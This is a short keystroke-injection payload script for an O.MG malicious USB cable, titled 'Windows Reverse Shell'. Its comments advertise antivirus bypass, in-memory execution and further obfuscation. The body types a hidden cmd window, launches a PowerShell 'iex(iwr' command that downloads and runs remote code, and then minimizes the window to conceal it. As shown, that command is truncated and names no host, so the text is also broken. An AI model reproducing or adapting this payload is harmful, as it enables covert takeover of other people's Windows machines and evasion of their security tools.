REM ############################################################################################################# REM # Title: Windows Reverse Shell # REM # Description: This script is designed to get a reverse shell in Windows enviroments # REM # with a one liner powershell command, this bypasses almost all antivirus out there and executes in memory. # REM # To use it, just clone the reverse shell, change the IP, load it into the OMG cable and wait for nc. # REM # You can even ofuscate the powershell with Invoke-Obfuscation and pyfuscation to make it even more # REM # undetectable. # REM # Author: Hug1n # REM ############################################################################################################# REM @@ Opening the CMD GUI r DELAY 500 STRING cmd.exe ENTER DELAY 200 REM @@ Changing the color, risizing the CMD and executing the reverse shell in memory STRING cmd /C color FE&mode con:cols=18 lines=1&powershell "iex(iwr" DELAY 200 ENTER REM @@ Minimizing the CMD ALT SPACE DOWN DOWN DOWN ENTER